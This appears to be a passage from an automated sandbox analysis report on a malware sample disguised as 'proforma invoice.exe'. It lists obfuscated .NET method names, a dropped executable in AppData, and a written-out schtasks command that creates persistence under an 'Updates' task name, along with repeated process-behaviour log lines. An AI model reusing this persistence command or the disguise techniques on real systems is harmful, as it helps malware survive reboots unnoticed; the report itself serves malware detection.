Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, HsB6cEhmL1Dnenbik0.cs	High entropy of concatenated method names: 'iH1TeFwC5S', 'xlFTE54dFb', 'PtxTsgOeAj', 'KCnTlasA3M', 'SdCTAFtE21', 'dkMTdgynPe', 'lj6TRW3LLD', 'X8dTqLYHLd', 'vAsT7fpqth', 'gb4TL178HV'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, R6wLMqt5jEb2YGGg9e.cs	High entropy of concatenated method names: 'GRbiPT49Da', 'Cj4i9taUKW', 'd2jitwVJDU', 'QSHi5EjkPZ', 'addiaTjPbN', 'AEXikZrvF5', 'ymRi8tPP4C', 'wOji2h95oX', 'RvWixTHh7l', 'MJ0iKwjKAg'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, uqFF1RzSdGFrHl5b4x.cs	High entropy of concatenated method names: 'OMmFdCmYN4', 'PNKFqtkV7v', 'FCyF70VFq3', 'Jr0FGXZxAg', 'cPNFaC7VQC', 'aEGF8poMdE', 'q6KF2kAOfs', 't1pFIUoC7V', 'JOFFeJl5QZ', 'n2wFEudfUK'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, VUNrkTXdX06dje6RkF.cs	High entropy of concatenated method names: 'afvJw09PYa', 'dVnJyQFW9s', 'ToString', 'KxuJUCfky6', 'HxAJc2nKkm', 'FsQJMgCpFZ', 'YHmJ4rp1dg', 'bFHJQISASA', 'yjLJTI7PHk', 'up8JpHZQam'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, eKx1LZviwh9iXuwZd9.cs	High entropy of concatenated method names: 'IWMNqEKv1S', 'XBEN7mEyBe', 'wbuNGsxdY3', 'AA4NacHHQn', 'CpZN849UE9', 'scoN2AHH8a', 'nD7NKZx1V5', 'EBgN3ZoWQN', 'IfcNP9uI53', 'EfyNHAAWBl'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, syJphlcTajaUCfV0FF.cs	High entropy of concatenated method names: 'Dispose', 'o2OgZ4YRLJ', 'werraI3qGK', 'Vn7EDJgkMW', 'DfRgDlGX0c', 'xEOgzuOU63', 'ProcessDialogKey', 'OTqrfBVYhh', 'hagrgQF8t2', 'DLxrroVbLP'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, sBAJnnnSn1gmI7iGZs.cs	High entropy of concatenated method names: 'vTygTfjQw5', 'kQAgplqUAi', 'poQgwGU4bb', 'pvCgyPfLNj', 'Gsrgi1ojiH', 'VOQg0BiauF', 'u7lo5UUBwV5WPQSGYp', 'VUaBvKf4B36YI99wcL', 'HegggeAaGk', 'ajXgYUk6eF'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, nSt0wLKSpDoHL65hAM.cs	High entropy of concatenated method names: 'kf9TUt6qJb', 'dEhTM3ntPg', 'DP9TQXxtkG', 'dhoQD56ZD1', 'pUSQz9guBa', 'ObkTfQwQdy', 'ueyTgigWcu', 'IthTrwFKcw', 'HPwTYyvdYA', 'TD6TnG9HWi'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, YAC4Z07oQGU4bb0vCP.cs	High entropy of concatenated method names: 'yvMMlTfH9j', 'NWeMdMNaOt', 'jqvMqcZ8RB', 'HEtM79QLkg', 'moYMi55LPx', 'OLcM0JTxie', 'x1oMJwDyDT', 'yKAMVDbWU3', 'fRxMWs8bdx', 'xEdMFxo3gW'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, icgbEF8LHdvAJJNCZN.cs	High entropy of concatenated method names: 'j1fQIUNn0f', 'AlqQeimjtI', 'xVmQsPB0tl', 'g12QljmIZO', 'jhqQd1XopS', 'yMaQRnfD7e', 'wuIQ7tO5k6', 'EvYQLiywYW', 'VXkC8HMQrSnXDQoNWFt', 'A4WOskM8E3RCfxTIBT3'
Source: 0.2.proforma invoice.exe.93d0000.4.raw.unpack, DBVYhhZ4agQF8t2qLx.cs	High entropy of concatenated method names: 'zZTWG8F2PP', 'VKoWaJlAPy', 'i31Wk5ZP0k', 'qtqW8f6BPa', 'Fn5W2oUOnK', 'n5CWxIPHo5', 'vZ7WKQCByS', 'MLyW33sV6R', 'kd8WheLstB', 'RouWPxUC5g'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, WiHmOQGBiauFOXCSRe.cs	High entropy of concatenated method names: 'huuQBRM76y', 'BkfQcPJOeR', 'pZuQ4gymnm', 'OGvQT38mqx', 'YcZQphG3SU', 'zOE4OaUmEC', 'Oxj4mkgNM4', 'IUw4jQvMWd', 'vVZ41df6e7', 'ruR4ZYHjNP'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, PyOApGje3N2O4YRLJq.cs	High entropy of concatenated method names: 'v58WiqxZpW', 'S6MWJN2Keb', 'zaaWWQNX4Q', 'TQcWuWUuGk', 'QfnWoHyagD', 'fX8WIysnMq', 'Dispose', 'FpbVUHCJE8', 'gVfVcBA9rY', 'BnaVMKKTE5'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, vVbLP0DwljmXtWWceF.cs	High entropy of concatenated method names: 'gFJFMZ153v', 'nXvF4Q7OYg', 'DuiFQsQhpq', 'Y2rFTo07s8', 'kNyFWw0lal', 'XsOFpDS8mI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, Rq0BwamMBeOLUYY5aR.cs	High entropy of concatenated method names: 'b2aJ1IrynY', 'PTbJDSakn0', 'BRUVfZsACg', 'WjHVgJnrcN', 'ggnJHJW9LJ', 'PZfJ9dsZik', 'pZgJvoMpfx', 'NJnJtF8c7t', 'AcFJ5j3iSF', 'g8kJStnKxe'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, sfw71jgg3t49MjXGUgn.cs	High entropy of concatenated method names: 'R8wFD7a2qZ', 'uGgFzl7Txb', 'j1Zufqs2oo', 'cNKugxNCtU', 'OERur8fRWT', 'p9DuYkDOUN', 'Jgoun56KhE', 'lkcuBclZVu', 'iNOuUm6WUP', 'ONiuciBxnM'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, mfjQw5qpQAlqUAiSkP.cs	High entropy of concatenated method names: 'vjectVphMe', 'RZEc5BKtLu', 'HnNcSnRlfA', 'JK9cXMCiQ8', 't4dcOAmybs', 'zoqcmCMUfB', 'SQVcjCRlPV', 'Mh5c1ViRsc', 'St6cZNHjvi', 'RTZcDJKlj4'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, KCe7psr6YgQ0YnUNYD.cs	High entropy of concatenated method names: 'gmJsdCXUD', 'WkMlJKWen', 'n73dicphk', 'wUWRAaryA', 'ucG7iskxH', 'mvJLjYJDk', 'eK00QUAeoM5aQ7Cd4H', 'vv4sMINhKQJCuHKonv', 'EdsVwFdcD', 'qAOFUfqTQ'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, jA2dlspLgAa2OFDOi4.cs	High entropy of concatenated method names: 'hGLYBbvBFT', 'UUhYU0O2H4', 'xWSYcJDbbH', 'AHpYMrEqln', 'AwCY48046Y', 'iwLYQtGmRe', 'NPqYTOocTh', 'RKfYpMWUIy', 'n53Y6qo7Bk', 'Lh7YwQCx3Q'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, HsB6cEhmL1Dnenbik0.cs	High entropy of concatenated method names: 'iH1TeFwC5S', 'xlFTE54dFb', 'PtxTsgOeAj', 'KCnTlasA3M', 'SdCTAFtE21', 'dkMTdgynPe', 'lj6TRW3LLD', 'X8dTqLYHLd', 'vAsT7fpqth', 'gb4TL178HV'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, R6wLMqt5jEb2YGGg9e.cs	High entropy of concatenated method names: 'GRbiPT49Da', 'Cj4i9taUKW', 'd2jitwVJDU', 'QSHi5EjkPZ', 'addiaTjPbN', 'AEXikZrvF5', 'ymRi8tPP4C', 'wOji2h95oX', 'RvWixTHh7l', 'MJ0iKwjKAg'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, uqFF1RzSdGFrHl5b4x.cs	High entropy of concatenated method names: 'OMmFdCmYN4', 'PNKFqtkV7v', 'FCyF70VFq3', 'Jr0FGXZxAg', 'cPNFaC7VQC', 'aEGF8poMdE', 'q6KF2kAOfs', 't1pFIUoC7V', 'JOFFeJl5QZ', 'n2wFEudfUK'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, VUNrkTXdX06dje6RkF.cs	High entropy of concatenated method names: 'afvJw09PYa', 'dVnJyQFW9s', 'ToString', 'KxuJUCfky6', 'HxAJc2nKkm', 'FsQJMgCpFZ', 'YHmJ4rp1dg', 'bFHJQISASA', 'yjLJTI7PHk', 'up8JpHZQam'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, eKx1LZviwh9iXuwZd9.cs	High entropy of concatenated method names: 'IWMNqEKv1S', 'XBEN7mEyBe', 'wbuNGsxdY3', 'AA4NacHHQn', 'CpZN849UE9', 'scoN2AHH8a', 'nD7NKZx1V5', 'EBgN3ZoWQN', 'IfcNP9uI53', 'EfyNHAAWBl'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, syJphlcTajaUCfV0FF.cs	High entropy of concatenated method names: 'Dispose', 'o2OgZ4YRLJ', 'werraI3qGK', 'Vn7EDJgkMW', 'DfRgDlGX0c', 'xEOgzuOU63', 'ProcessDialogKey', 'OTqrfBVYhh', 'hagrgQF8t2', 'DLxrroVbLP'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, sBAJnnnSn1gmI7iGZs.cs	High entropy of concatenated method names: 'vTygTfjQw5', 'kQAgplqUAi', 'poQgwGU4bb', 'pvCgyPfLNj', 'Gsrgi1ojiH', 'VOQg0BiauF', 'u7lo5UUBwV5WPQSGYp', 'VUaBvKf4B36YI99wcL', 'HegggeAaGk', 'ajXgYUk6eF'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, nSt0wLKSpDoHL65hAM.cs	High entropy of concatenated method names: 'kf9TUt6qJb', 'dEhTM3ntPg', 'DP9TQXxtkG', 'dhoQD56ZD1', 'pUSQz9guBa', 'ObkTfQwQdy', 'ueyTgigWcu', 'IthTrwFKcw', 'HPwTYyvdYA', 'TD6TnG9HWi'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, YAC4Z07oQGU4bb0vCP.cs	High entropy of concatenated method names: 'yvMMlTfH9j', 'NWeMdMNaOt', 'jqvMqcZ8RB', 'HEtM79QLkg', 'moYMi55LPx', 'OLcM0JTxie', 'x1oMJwDyDT', 'yKAMVDbWU3', 'fRxMWs8bdx', 'xEdMFxo3gW'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, icgbEF8LHdvAJJNCZN.cs	High entropy of concatenated method names: 'j1fQIUNn0f', 'AlqQeimjtI', 'xVmQsPB0tl', 'g12QljmIZO', 'jhqQd1XopS', 'yMaQRnfD7e', 'wuIQ7tO5k6', 'EvYQLiywYW', 'VXkC8HMQrSnXDQoNWFt', 'A4WOskM8E3RCfxTIBT3'
Source: 0.2.proforma invoice.exe.4370698.0.raw.unpack, DBVYhhZ4agQF8t2qLx.cs	High entropy of concatenated method names: 'zZTWG8F2PP', 'VKoWaJlAPy', 'i31Wk5ZP0k', 'qtqW8f6BPa', 'Fn5W2oUOnK', 'n5CWxIPHo5', 'vZ7WKQCByS', 'MLyW33sV6R', 'kd8WheLstB', 'RouWPxUC5g'

Source: C:\Users\user\Desktop\proforma invoice.exe

File created: C:\Users\user\AppData\Roaming\CGWlZD.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\proforma invoice.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CGWlZD" /XML "C:\Users\user\AppData\Local\Temp\tmp4844.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
